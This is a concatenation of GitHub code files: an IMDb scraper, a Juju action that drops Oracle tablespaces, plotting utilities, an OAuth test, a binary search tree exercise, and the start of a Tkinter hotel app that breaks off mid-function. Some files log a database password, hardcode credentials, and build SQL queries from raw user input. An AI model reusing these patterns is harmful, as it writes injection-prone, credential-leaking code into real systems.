BeautifulSoup\n\n\"\"\"\n    1. Get the HTML markup\n        - If the HTML file does not exist locally, create it\n        - If the HTML file exists locally, read its content\n    2. Extract the information\n        - Name\n        - Categories\n        - Cast\n    3. Generate the CSV file\n\"\"\"\n\nURL = 'https://www.imdb.com/calendar/?region=MX'\n
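# Note: the region query parameter above is specific to this script; swapping\n# 'MX' for another ISO region code should fetch a different release calendar,\n# though IMDb's markup may vary by region.\n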
\ndef get_imdb_content():\n    headers = {\n        'User-Agent': 'Mozilla/5.0'\n    }\n    \n    response = requests.get(URL, headers=headers)\n    if response.status_code == 200:\n        return response.text\n    \n    return None\n\ndef get_imdb_file_local():\n    content = None\n    try:\n        with open('imdb.html', 'r') as file:\n            content = file.read()\n    except:\n        pass\n    \n    return content\n    \ndef create_imdb_file_local(content):\n    \n    try:\n        with open('imdb.html', 'w') as file:\n            file.write(content)\n    except:\n        pass\n    \n    return content\n    \ndef get_local_imdb_content():\n    # If there is no local copy yet, fetch the page and cache it\n    content = get_imdb_file_local()\n    if content is None:\n        content = get_imdb_content()\n        create_imdb_file_local(content)\n    return content\n\n\ndef create_movie(tag):\n    main_div = tag.find('div', {'class': 'ipc-metadata-list-summary-item__c'})\n    sub_div = main_div.find('div', {'class': 'ipc-metadata-list-summary-item__c'})\n    name = main_div.div.a.text\n    \n    \n    ul_categories= main_div.find('ul', {\n        'class': 'ipc-inline-list ipc-inline-list--show-dividers ipc-inline-list--no-wrap ipc-inline-list--inline ipc-metadata-list-summary-item__tl base'\n    })\n    \n    ul_cast = main_div.find('ul', {\n        'class': 'ipc-inline-list ipc-inline-list--show-dividers ipc-inline-list--no-wrap ipc-inline-list--inline ipc-metadata-list-summary-item__stl base'\n    })\n    \n    categories = [category.span.text for category in ul_categories.find_all('li')]\n    \n    \n    cast = None\n    \n    cast = [ cast.span.text for cast in ul_cast.find_all('li') ] if ul_cast else []\n    \n    return (name, categories, cast)\n\n\ndef create_csv_movies_file(movies):\n    with open('movies.csv', 'w') as file:\n        writer = csv.writer(file, delimiter=\"-\")\n        writer.writerow(['name', 'categories', 'cast'])\n        \n        for movie in movies:\n            writer.writerow([\n                movie[0],\n                \",\".join(movie[1]), # Categories\n                \",\".join(movie[2]), # Cast\n            ]) \n        \ndef create_json_movies_file(movies):\n    movies_list = [\n        {\n            'name': movie[0],\n            'categories': movie[1],\n            'cast': movie[2],\n        }\n        for movie in movies\n    ]\n    with open('movies.json', 'w', encoding='latin-1') as file:\n        json.dump(movies_list, file, indent=4)\n\ndef main():\n    content = get_local_imdb_content()\n    \n    soup = BeautifulSoup(content, 'html.parser')\n    li_tags = soup.find_all('li', {\n        'data-testid': 'coming-soon-entry',\n        'class': 'ipc-metadata-list-summary-item ipc-metadata-list-summary-item--click sc-8c2b7f1f-0 bpqYIE'\n    })\n    \n    movies = []\n    for tag in li_tags:\n        movie = create_movie(tag)\n        movies.append(movie)\n    \n    create_csv_movies_file(movies)\n    create_json_movies_file(movies)\n    \n    \nif __name__ == '__main__':\n    main()","repo_name":"ioseluiz/imdb_scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27142961902","text":"#!/usr/bin/python\nimport subprocess\nimport sys\nimport os\nfrom subprocess import PIPE\n\n\nsys.path.append('hooks/')\n\nimport cplane_utils\n\nfrom charmhelpers.core.hookenv import (\n    config,\n    log,\n    action_set,\n    action_fail,\n)\n\nfrom cplane_utils import (\n    set_oracle_env,\n    configure_oracle_client,\n    set_oracle_host,\n\n)\n\n\ndef execute_sql_command(connect_string, sql_command):\n    session = subprocess.Popen(['sqlplus', '-S', connect_string], stdin=PIPE,\n                               stdout=PIPE, stderr=PIPE)\n    session.stdin.write(sql_command)\n    return session.communicate()\n\n\ndef drop_cplane_data(args):\n    connect_string = ''\n    if config('jboss-db-on-host'):\n        set_oracle_env()\n        connect_string = 'sys/' + 
config('oracle-password') + \\\n '@localhost/XE as sysdba'\n else:\n configure_oracle_client()\n oracle_host = set_oracle_host()\n if oracle_host:\n host = cplane_utils.ORACLE_HOST + '/'\n connect_string = 'sys/' + cplane_utils.DB_PASSWORD \\\n + '@' + host + cplane_utils.DB_SERVICE + ' as' \\\n + ' sysdba'\n else:\n action_set({'result-map.message': \"No Oracle Host found\"})\n\n log(\"Dropping user and tables spaces from DB\")\n log(connect_string)\n res = execute_sql_command(connect_string, \"drop user admin cascade;\")\n action_set({'result-map.message': res})\n res = execute_sql_command(connect_string, \"drop tablespace cp_tabs \\\nincluding contents and datafiles cascade constraints;\")\n action_set({'result-map.message': res})\n res = execute_sql_command(connect_string, \"drop tablespace cp_tabm \\\nincluding contents and datafiles cascade constraints;\")\n action_set({'result-map.message': res})\n res = execute_sql_command(connect_string, \"drop tablespace cp_tabl \\\nincluding contents and datafiles cascade constraints;\")\n action_set({'result-map.message': res})\n res = execute_sql_command(connect_string, \"drop tablespace cp_inds \\\nincluding contents and datafiles cascade constraints;\")\n action_set({'result-map.message': res})\n res = execute_sql_command(connect_string, \"drop tablespace cp_indm \\\nincluding contents and datafiles cascade constraints;\")\n action_set({'result-map.message': res})\n res = execute_sql_command(connect_string, \"drop tablespace cp_indl \\\nincluding contents and datafiles cascade constraints;\")\n action_set({'result-map.message': res})\n\nACTIONS = {\"drop-cplane-data\": drop_cplane_data}\n\n\ndef main(args):\n action_name = os.path.basename(args[0])\n try:\n action = ACTIONS[action_name]\n except KeyError:\n return \"Action %s undefined\" % action_name\n else:\n try:\n action(args)\n except Exception as e:\n action_fail(str(e))\n\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","repo_name":"cplane-networks/dvnd-juju","sub_path":"cplane-controller/actions/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"33847429128","text":"from __future__ import absolute_import\n\nimport numpy as np\n\nfrom six import itervalues, iteritems\nfrom six.moves import range, map, zip\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.cbook as cb\nimport matplotlib.colors as mcolors\nimport matplotlib.gridspec as mgridspec\nfrom matplotlib.colors import colorConverter\nfrom matplotlib.collections import PatchCollection, LineCollection, PolyCollection\nfrom matplotlib.patches import Arrow, FancyArrow\n\nfrom operator import itemgetter\n\nfrom . import make_toDataDir\ntoDataDir = make_toDataDir(__file__)\n\ntry:\n import pandas as pd\n from . 
import shapes as vshapes\n from shapely.geometry import MultiPolygon\n\n def flatten(it):\n for sh in it:\n if isinstance(sh, MultiPolygon):\n for p in sh:\n yield p\n else:\n yield sh\n\n def germany2(with_laender=False, ax=None, linewidth=10, **kwargs):\n if ax is None:\n ax = plt.gca()\n\n if with_laender:\n laender = LineCollection(map(vshapes.points, flatten(itervalues(vshapes.laender()))),\n colors=\"gray\", zorder=0, linewidths=linewidth)\n ax.add_collection(laender)\n line, = ax.plot(*vshapes.points(vshapes.germany()).T, color='k', linewidth=linewidth)\n line.set_zorder(1)\n\n def landkreise(data,\n colorbar=True, colorbar_ticklabels=None,\n norm=None, ax=None):\n \"\"\"\n Plot data on german Landkreis level. Needs a pandas Series with\n the corresponding regionalschluessel as index.\n\n Parameters\n ----------\n data : pd.Series\n Float valued data to be plotted.\n colorbar : bool | dict\n Whether to plot a colorbar and if a non-empty dict is\n passed extra kw arguments to pass to the colorbar call.\n colorbar_ticklabels : list of strings\n\n Returns\n -------\n collection : PolyCollection\n \"\"\"\n\n return shapes(vshapes.landkreise(), data=data,\n colorbar=colorbar, colorbar_ticklabels=colorbar_ticklabels,\n norm=norm, ax=ax)\n\n def shapes(shapes, data=None, colorbar=False, colorbar_ticklabels=None,\n norm=None, with_labels=False, edgecolors=None, facecolors=None,\n fontsize=None, ax=None, **kwds):\n \"\"\"\n Plot `data` on the basis of a dictionary of shapes. `data`\n must be given as a pandas Series with the corresponding keys\n of shapes as index.\n\n Parameters\n ----------\n shapes : dict | pd.Series\n Dictionary of shapes\n data : pd.Series\n Float valued data to be plotted. If data is omitted,\n np.arange(N) will be used.\n with_labels : bool\n Whether to plot the name of each shape at its centroid\n\n Returns\n -------\n collection : PolyCollection\n \"\"\"\n\n if 'outline' in kwds:\n # deprecated\n if kwds.pop('outline'): facecolors = 'none'\n\n if 'colour' in kwds:\n # deprecated\n edgecolors = kwds.pop('colour')\n\n if ax is None:\n ax = plt.gca()\n\n if not isinstance(shapes, pd.Series):\n shapes = pd.Series(shapes)\n\n def flatten_multipolygons(shapes):\n flat_shapes = []\n flat_index = []\n\n for n, sh in shapes.iteritems():\n if isinstance(sh, MultiPolygon):\n flat_shapes += list(sh)\n flat_index += [n] * len(sh)\n else:\n flat_shapes.append(sh)\n flat_index.append(n)\n\n return pd.Series(flat_shapes, index=flat_index)\n\n\n if isinstance(edgecolors, pd.Series):\n shapes = shapes.reindex(edgecolors.index)\n flat_shapes = flatten_multipolygons(shapes)\n edgecolors = edgecolors.reindex(flat_shapes.index)\n elif isinstance(facecolors, pd.Series):\n shapes = shapes.reindex(facecolors.index)\n flat_shapes = flatten_multipolygons(shapes)\n facecolors = facecolors.reindex(flat_shapes.index)\n elif isinstance(data, pd.Series):\n shapes = shapes.reindex(data.index)\n flat_shapes = flatten_multipolygons(shapes)\n data = data.reindex(flat_shapes.index)\n else:\n flat_shapes = flatten_multipolygons(shapes)\n if facecolors is None:\n data = pd.Series(np.arange(len(shapes)), index=shapes.index).reindex(flat_shapes.index)\n\n coll = PolyCollection((np.asarray(x.exterior)\n for x in flat_shapes),\n transOffset=ax.transData,\n facecolors=facecolors,\n edgecolors=edgecolors, **kwds)\n\n if data is not None:\n coll.set_array(data)\n\n if norm is not None:\n coll.set_norm(norm)\n\n ax.add_collection(coll, autolim=True)\n\n if colorbar:\n kwargs = dict()\n if isinstance(colorbar, 
dict):\n kwargs.update(colorbar)\n\n ## FIXME : sounds like a bug to me, but hey\n #if norm is not None:\n # norm.autoscale(data)\n\n cbar = plt.colorbar(mappable=coll, ax=ax, **kwargs)\n if colorbar_ticklabels is not None:\n cbar.ax.set_yticklabels(colorbar_ticklabels)\n\n if with_labels:\n for k,v in iteritems(shapes.reindex(data.index)):\n x,y = np.asarray(v.centroid)\n ax.text(x, y, k, fontsize=fontsize,\n horizontalalignment='center',\n verticalalignment='center')\n\n ax.autoscale_view()\n return coll\n\n def plot_flow(G, P, F, colorbar=True):\n plt.figure()\n gs = mgridspec.GridSpec(4, 4,\n width_ratios=[3,18,3,1],\n height_ratios=[1,14,1,1]\n )\n ax = plt.subplot(gs[0:3,0:3])\n if colorbar:\n cax1 = plt.subplot(gs[1,3])\n cax2 = plt.subplot(gs[3,1])\n\n ax.set_aspect('equal')\n\n # Nodes\n vmax = abs(P).max()\n pos = {c: np.asarray(sh.centroid) for c, sh in iteritems(shapes)}\n x, y = np.asarray(itemgetter(*nodelist)(pos)).T\n mappable = ax.scatter(x, y, s=45., c=P, cmap='coolwarm', vmin=-vmax, vmax=+vmax)\n draw_countries([np.NaN]*30, facecolors='None', ax=ax, zorder=-3)\n if colorbar:\n plt.colorbar(mappable, cax=cax1).set_label(r'$P_n$ / GW')\n\n # Edges\n cc = mcolors.ColorConverter()\n cmap = mcolors.LinearSegmentedColormap.from_list(\n 'darkblue-alpha',\n [cc.to_rgba('darkblue', alpha=a) for a in (0., 1.)]\n )\n norm = mcolors.Normalize()\n\n lines = []\n arrows = []\n for (u, v), f in zip(edgelist, F):\n if f < 0: u, v = v, u\n x1, y1 = pos[u]\n x2, y2 = pos[v]\n\n lines.append([(x1, y1), (x2, y2)])\n arrows.append(FancyArrow(x1, y1, 0.5*(x2 - x1), 0.5*(y2 - y1), head_width=1.5))\n\n linecol = LineCollection(lines, lw=3., cmap=cmap, zorder=-2, norm=norm)\n linecol.set_array(abs(F))\n ax.add_collection(linecol)\n\n arrowcol = PatchCollection(arrows, cmap=cmap, zorder=-1, norm=norm, edgecolors='none')\n arrowcol.set_array(abs(F))\n ax.add_collection(arrowcol)\n #plt.plot((x1, x2), (y1, y2), color='darkblue', alpha=norm(abs(f)), lw=3., zorder=-2)\n\n plt.colorbar(linecol, cax=cax2, orientation='horizontal').set_label(r'$|F_l|$ / GW')\n\nexcept ImportError:\n pass\n\ntry:\n from mpl_toolkits.basemap import Basemap\n\n def germany(resolution='l', ax=None, meta=None):\n\n if meta is None:\n llcrnrlat = 47\n urcrnrlat = 56\n llcrnrlon = 5.5\n urcrnrlon = 15.5\n else:\n llcrnrlat = meta['latitudes'][-1,0]\n urcrnrlat = meta['latitudes'][0,-1]\n llcrnrlon = meta['longitudes'][-1,0]\n urcrnrlon = meta['longitudes'][0,-1]\n m = Basemap(projection='cyl', resolution=resolution,\n llcrnrlat=llcrnrlat, urcrnrlat=urcrnrlat,\n llcrnrlon=llcrnrlon, urcrnrlon=urcrnrlon,\n ax=ax)\n m.drawcoastlines()\n m.drawcountries()\n return m\n\n def draw_basemap(resolution='l', ax=None, **kwds):\n if ax is None:\n ax = plt.gca()\n m = Basemap(*(tuple(ax.viewLim.min) + tuple(ax.viewLim.max)), resolution=resolution, ax=ax, **kwds)\n m.drawcoastlines()\n m.drawcountries()\n return m\n\nexcept ImportError:\n pass\n\ntry:\n import networkx as nx\n\n def _is_string_like(obj):\n \"\"\"Check if obj is string.\"\"\"\n # 2.x/3.x compatibility\n try:\n basestring\n except NameError:\n basestring = str\n return isinstance(obj, basestring)\n \n def draw_edges(G, segments, pos=None, edgelist=None, width=1.0, color='k',\n style='solid', alpha=None, ax=None, **kwds):\n \"\"\"Draw the edges of the graph G.\n\n This draws the edge segments given by a separation of the links in\n `data` of the graph G.\n\n Parameters\n ----------\n G : graph\n A networkx graph\n\n segments : L x M array\n The segmentation of each link. 
(segments.sum(axis=1) == 1).all()\n\n pos : dictionary\n A dictionary with nodes as keys and positions as values.\n Positions should be sequences of length 2.\n (default=nx.get_node_attributes(G, 'pos'))\n\n edgelist : collection of edge tuples\n Draw only specified edges(default=G.edges())\n\n width : float or array of floats\n Line width of edges (default =1.0)\n\n color : tuple of color strings\n Edge Segments color. Can be a single color format string (default='r'),\n or a sequence of colors with the same length as data.shape[1].\n\n style : string\n Edge line style (default='solid') (solid|dashed|dotted,dashdot)\n\n alpha : float\n The edge transparency (default=1.0)\n\n ax : Matplotlib Axes object, optional\n Draw the graph in the specified Matplotlib axes.\n\n Returns\n -------\n matplotlib.collection.LineCollection\n `LineCollection` of the edge segments\n\n \"\"\"\n if not np.allclose(segments.sum(axis=1), 1):\n segments = segments / segments.sum(axis=1, keepdims=True)\n\n if ax is None:\n ax = plt.gca()\n\n if pos is None:\n pos = nx.get_node_attributes(G, 'pos')\n\n if edgelist is None:\n edgelist = G.edges()\n\n if not edgelist or len(edgelist) == 0: # no edges!\n return None\n\n if not cb.iterable(width):\n lw = (width,)\n else:\n lw = width\n\n if cb.iterable(color) \\\n and len(color) == segments.shape[1]:\n if np.alltrue([_is_string_like(c) for c in color]):\n # (should check ALL elements)\n # list of color letters such as ['k','r','k',...]\n edge_colors = tuple([colorConverter.to_rgba(c, alpha) for c in color])\n elif (np.alltrue([not _is_string_like(c) for c in color])\n and np.alltrue([cb.iterable(c) and len(c) in (3, 4) for c in color])):\n edge_colors = tuple(color)\n else:\n raise ValueError('color must consist of either color names or numbers')\n else:\n if _is_string_like(color) or len(color) == 1:\n edge_colors = (colorConverter.to_rgba(color, alpha), )\n else:\n raise ValueError('color must be a single color or list of exactly m colors where m is the number of segments')\n\n assert len(edgelist) == segments.shape[0], \"Number edges and segments have to line up\"\n\n # set edge positions\n edge_pos = np.asarray([(pos[e[0]], pos[e[1]]) for e in edgelist])\n\n src = edge_pos[:,0]\n dest = edge_pos[:,1]\n\n positions = src[:,np.newaxis] + np.cumsum(np.hstack((np.zeros((len(segments), 1)), segments)), axis=1)[:,:,np.newaxis]*(dest - src)[:,np.newaxis]\n\n linecolls = []\n for s in range(segments.shape[1]):\n coll = LineCollection(positions[:,s:s+2],\n colors=edge_colors[s:s+1],\n linewidths=lw,\n antialiaseds=(1,),\n linestyle=style,\n transOffset = ax.transData)\n\n coll.set_zorder(1) # edges go behind nodes\n # coll.set_label(label)\n\n if cb.is_numlike(alpha):\n coll.set_alpha(alpha)\n\n ax.add_collection(coll)\n linecolls.append(coll)\n\n # update view\n minx = np.amin(np.ravel(edge_pos[:, :, 0]))\n maxx = np.amax(np.ravel(edge_pos[:, :, 0]))\n miny = np.amin(np.ravel(edge_pos[:, :, 1]))\n maxy = np.amax(np.ravel(edge_pos[:, :, 1]))\n\n w = maxx-minx\n h = maxy-miny\n padx, pady = 0.05*w, 0.05*h\n corners = (minx-padx, miny-pady), (maxx+padx, maxy+pady)\n ax.update_datalim(corners)\n ax.autoscale_view()\n\n return linecolls\nexcept ImportError:\n pass\n","repo_name":"FRESNA/vresutils","sub_path":"vresutils/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":13622,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"38162025104","text":"\"\"\"\nIntegration tests for oauth2.py\n\"\"\"\nimport 
os\n\nfrom ticktick.oauth2 import OAuth2\n\n\ndef test_oauth2_from_environment():\n    \"\"\"\n    Tests successful validation of access token from environment\n    \"\"\"\n    client_id = os.getenv('CLIENT_ID')\n    client_secret = os.getenv('CLIENT_SECRET')\n    redirect_uri = os.getenv('URI')\n\n    auth_client = OAuth2(client_id=client_id,\n                         client_secret=client_secret,\n                         redirect_uri=redirect_uri,\n                         env_key=\"ACCESS_TOKEN_DICT\")\n\n    assert auth_client.access_token_info[\"access_token\"] == os.getenv('ACCESS_TOKEN')","repo_name":"lazeroffmichael/ticktick-py","sub_path":"tests/integration/test_oauth2.py","file_name":"test_oauth2.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":179,"dataset":"github-code","pt":"48"} +{"seq_id":"43039834317","text":"import queue\n\n\nclass Node:\n\n    def __init__(self,data):\n        self.data = data\n        self.left = None\n        self.right = None\n\nclass Tree:\n\n    def __init__(self):\n        self.root = None\n\n    def insert(self,data):\n        if self.root is None:\n            self.root = Node(data)\n\n        else:\n            curr = self.root\n            while 1:\n                if data < curr.data:\n                    if curr.left is None:\n                        curr.left = Node(data)\n                        break\n                    else:\n                        curr = curr.left\n                elif data > curr.data:\n                    if curr.right is None:\n                        curr.right = Node(data)\n                        break\n                    else:\n                        curr = curr.right\n\n    # V-L-R\n    def preorder(self,x):\n\n        if x is not None:\n            print(x.data)\n            self.preorder(x.left)\n            self.preorder(x.right)\n\n    # L-V-R\n    def inorder(self,x):\n\n        if x is not None:\n            self.inorder(x.left)\n            print(x.data)\n            self.inorder(x.right)\n\n    # L-R-V\n    def postorder(self,x):\n\n        if x is not None:\n            self.postorder(x.left)\n            self.postorder(x.right)\n            print(x.data)\n\n    def modifiedInorder(self,x,temp):\n\n        print(\"We are in modified Inorder\")\n        if x is not None:\n            self.modifiedInorder(x.left,temp)\n\n            print(x.data)\n            temp.append(x.data)\n\n            self.modifiedInorder(x.right,temp)\n        # print(\"List is\", temp)\n        return temp\n\n    def searchForSuccessor(self, curr):\n        temp = []\n        z = self.modifiedInorder(self.root,temp)\n        # print(z)\n        # print(z.index(curr.data))\n        y = z[z.index(curr.data) + 1]\n        successor = y\n        # print(successor)\n        self.delete(successor)\n        curr.data = successor\n\n\n    def delete(self,key):\n\n        # first search\n        if self.root is None:\n            print(\"Not found\")\n        curr = self.root\n\n        while curr is not None and curr.data != key:\n\n            # print(\"Enter\")\n\n            parent = curr\n\n            if curr is None:\n                return (\"Key not present\")\n            if curr.data == key:\n                print(\"Found\")\n                break\n\n            elif key < curr.data:\n\n                curr = curr.left\n                continue\n\n            elif key > curr.data:\n\n                curr = curr.right\n                continue\n        # print(curr.data)\n\n        # if curr is a leaf node\n        if curr.left is None and curr.right is None:\n            if curr.data > parent.data:\n                parent.right = None\n            else:\n                parent.left = None\n            return\n            # break\n\n        # if curr has right child only\n        elif curr.left is None:\n            temp = curr.right.data\n            curr.data = temp\n            curr.right = None\n            # break\n\n        # if curr has left child only\n        elif curr.right is None:\n            temp = curr.left.data\n            curr.data = temp\n            curr.left = None\n            # break\n\n\n\n        # when the node to be deleted is a node having both left and right subtree\n        # replace the node to be deleted with the inorder successor\n        elif curr.left != None and curr.right != None:\n            self.searchForSuccessor(curr)\n    \n    def LevelOrderTraversal(self,x):\n        s = queue.Queue()\n        s.put(x)\n        while s.empty() == False:\n            node = s.get()\n            print(node.data)\n            if node.left != None:\n                s.put(node.left)\n            if node.right!= None:\n                s.put(node.right)\n    \n
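    # Note on the method below: it alternates two stacks - s1 is drained\n    # left-to-right while pushing children left-then-right onto s2, and s2 is\n    # drained right-to-left while pushing right-then-left back onto s1, so the\n    # traversal direction flips on every level.\n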
    # ZigZag traversal right->left->right...\n    def zigzag(self,x):\n        # initialize 2 stacks\n        s1 = []\n        s2 = []\n        curr = x\n        s1.append(curr)\n        while len(s1) != 0 or len(s2) != 0:\n            while len(s1) != 0:\n                temp = s1.pop()\n                if temp.left != None:\n                    s2.append(temp.left)\n                if temp.right != None:\n                    s2.append(temp.right)\n                print(temp.data)\n            while len(s2) != 0:\n                temp = s2.pop()\n                if temp.right != None:\n                    s1.append(temp.right)\n                if temp.left != None:\n                    s1.append(temp.left)\n                print(temp.data)\n    \n    # Store parent node of each node in a dict\n    def getParentNode(self,x):\n        q = queue.Queue()\n        q.put(x)\n        d = {} # initialize a dict\n        # d[x] = None\n        while q.empty() == False:\n            temp = q.get()\n            if temp == x:\n                d[temp] = None\n            if temp.left != None:\n                q.put(temp.left)\n                d[temp.left] = temp\n            if temp.right!= None:\n                q.put(temp.right)\n                d[temp.right] = temp\n        return d\n\n    # Print all nodes at distance k from a given node\n    def allNodesAtDistanceK(self,target,k):\n        start = self.search(target)\n        if start is None:\n            print(\"Target not found\")\n            return\n\n        parent_map = self.getParentNode(self.root)\n\n        q = queue.Queue()\n        seen_dict = {}\n        seen_dict[start] = 1\n        q.put(start)\n        level = 0\n        while q.empty() == False:\n            if level == k:\n                for i in range(q.qsize()):\n                    print(\"Nodes at distance K are:\", q.get().data)\n                break\n            x = q.qsize()\n            i = 0\n            while i < x:\n                temp = q.get()\n\n                print(temp.data)\n                if temp.left != None:\n                    if temp.left not in seen_dict:\n                        q.put(temp.left)\n                        seen_dict[temp.left] = 1\n                if temp.right!= None:\n                    if temp.right not in seen_dict:\n                        q.put(temp.right)\n                        seen_dict[temp.right] = 1\n                if parent_map[temp] != None:\n                    if parent_map[temp] not in seen_dict:\n                        q.put(parent_map[temp])\n                        seen_dict[parent_map[temp]] = 1\n                i = i + 1\n            level = level + 1\n\n    # searching for a node; returns the node, or None if it is absent\n    def search(self,key):\n\n        if self.root is None:\n            print(\"Not found\")\n            return None\n\n        curr = self.root\n\n\n        while 1:\n            if curr is None:\n                print(\"Key not present\")\n                return None\n            if curr.data == key:\n                print(\"Found\")\n                return curr\n            elif key < curr.data:\n                curr = curr.left\n            elif key > curr.data:\n                curr = curr.right\n\n    # calculates height based on the number of nodes.\n    # to calculate height based on the number of edges, return -1 if curr is None\n    def heightOfBinarytree(self,x):\n\n        curr = x\n        if curr is None:\n            return 0\n\n        lheight = self.heightOfBinarytree(curr.left)\n        rheight = self.heightOfBinarytree(curr.right)\n        return max(lheight,rheight) + 1\n\n\n\ntree = Tree()\n# arr = [8,3,1,6,4,7,10,14,13]\n\n# arr = [4, 2, 5, 1, 3]\n# arr = [4, 2, 5, 1, 3]\narr = [15,5,8,6,24,19,30,21,9]\n\nfor i in arr:\n    tree.insert(i)\n\n# print(\"Printing preorder\")\n# tree.preorder(tree.root)\n#\n# print(\"Printing postorder\")\n# tree.postorder(tree.root)\n#\nprint(\"Printing inorder\")\ntree.inorder(tree.root)\n#\n# print(\"search\")\n# tree.search(6)\n#\n# print(\"Height of the tree\")\n# print(tree.heightOfBinarytree(tree.root))\n\nprint(\"Deleting a node\")\ntree.delete(15)\n\ntree.inorder(tree.root)\n\nprint(\"Level Order Traversal\")\ntree.LevelOrderTraversal(tree.root)\n\nprint(\"ZigZag Traversal\")\ntree.zigzag(tree.root)\n\n# tree.search(3)\n# tree.delete(3)\n\n# print(\"Get Parent node\")\n# tree.getParentNode(tree.root)\n\nprint(\"All nodes at distance k\")\ntree.allNodesAtDistanceK(5,2)\n\n\n# References:\n# https://www.geeksforgeeks.org/how-to-handle-duplicates-in-binary-search-tree/\n# https://stackoverflow.com/questions/300935/are-duplicate-keys-allowed-in-the-definition-of-binary-search-trees\n# https://gist.github.com/samidhtalsania/6659380\n# 
https://www.youtube.com/watch?v=ZM-sV9zQPEs&t=519s\n# https://docs.python.org/3/library/asyncio-queue.html\n# https://www.youtube.com/watch?v=vjt5Y6-1KsQ\n# https://www.youtube.com/watch?v=nPtARJ2cYrg\n","repo_name":"harshdev93/DataStructures-Python","sub_path":"BinaryTrees/BinarySearchTreeOperations.py","file_name":"BinarySearchTreeOperations.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24181581246","text":"from tkinter import *\nimport tkinter.font as tkFont\nimport pymysql\nimport tkinter.messagebox as box\nroot = Tk()\nroot.title('Login Page')\nroot.geometry('600x600')\nroot['bg'] = '#bed2ed'\nconn = pymysql.connect(\"localhost\", \"root\", \"mumbai@2019\", \"dbmsp\")\ncur = conn.cursor()\n# cur.execute(\"\"\"CREATE TABLE IF NOT EXISTS details\n# (Name CHAR(15) NOT NULL,\n# RollNO CHAR(10) NOT NULL,\n# Class CHAR(10) NOT NULL,\n# ID CHAR(10) NOT NULL,\n# EMail CHAR(100) NOT NULL,\n# MobileNo CHAR(50) NOT NULL)\"\"\")\nfontStylem = tkFont.Font(family=\"Algerian\", size=40)\nwlcm = Label(root, text = \"Welcome\\n To\\n Golden Finger\", font = fontStylem, bg='#bed2ed')\nwlcm.place(x=80,y=20)\n# fontStyle = tkFont.Font(family=\"Calibri\", size=15)\n# sel = Label(root, text = \"Please select the type of room\", font = fontStyle, bg='#bed2ed')\n# sel.grid(row = 5, column = 10)\n\n# Create a Tkinter variable\n# tkvar = StringVar(root)\n\n# # Dictionary with options\n# choices = { 'Pizza','Lasagne','Fries','Fish','Potatoennnnnnnnnnnnnnnnnnnnn'}\n# tkvar.set('Pizza') # set the default option\n\n# popupMenu = OptionMenu(root, tkvar, *choices)\n\n# popupMenu.grid(row = 30, column=10, columnspan=2, pady=10, padx=10, ipadx=135)\n# # on change dropdown value\n# def change_dropdown(*args):\n# print( tkvar.get() )\n\n# #link function to change dropdown\n# tkvar.trace('w', change_dropdown)\n\ndef proceed_br():\n\n\th_city = hce.get()\n\tr_no = rne.get()\n\tpbr = Tk()\n\tpbr.title('book room')\n\tpbr.geometry('600x600')\n\tpbr['bg'] = '#bed2ed'\n\n\tconn = pymysql.connect(\"localhost\", \"root\", \"mumbai@2019\", \"dbmsp\")\n\tcur=conn.cursor()\n\tcur.execute(\"SELECT count(*) from cust_hist where room_no = \" +str(r_no)+\" and hotel_id in (SELECT hotel_id FROM hotel where hotel_city = '\"+h_city+\"')\")\n\tnm =[ naam[0] for naam in cur.fetchall()]\n\tlb1 = Label(pbr, text = \"Total times booked: \"+str(nm[0]),font=(\"arial\", 20, \"bold\"), bg='#bed2ed')\n\tlb1.place(x=150,y=50)\n\n\ndef proceed_fr():\n\thname = hne.get()\n\trtype = rte.get()\n\tpfr = Tk()\n\tpfr.title('book room')\n\tpfr.geometry('600x600')\n\tpfr['bg'] = '#bed2ed'\n\t\n\tconn = pymysql.connect(\"localhost\", \"root\", \"mumbai@2019\", \"dbmsp\")\n\tcur=conn.cursor()\n\tcur.execute(\"SELECT count(room_no) from rooms where room_type = '\" +rtype+\"' and hotel_id in (SELECT hotel_id FROM hotel where hotel_city = '\"+hname+\"')\")\n\tnm =[ naam[0] for naam in cur.fetchall()]\n\tlb1 = Label(pfr, text = \"Total: \"+str(nm[0]),font=(\"arial\", 20, \"bold\"), bg='#bed2ed')\n\tlb1.place(x=150,y=50)\n\n\tcur.execute(\"SELECT count(room_no) from rooms where is_available = 'y' and room_type = '\" +rtype+\"' and hotel_id in (SELECT hotel_id FROM hotel where hotel_city = '\"+hname+\"')\")\n\tnm1 =[ naam[0] for naam in cur.fetchall()]\n\tlb2 = Label(pfr, text = \"Available: \"+str(nm1[0]),font=(\"arial\", 20, \"bold\"), bg='#bed2ed')\n\tlb2.place(x=150,y=90)\n\n\tconn.commit()\n\tconn.close() \n\n\ndef findroom():\n\tglobal hne, rte\n\tfr 
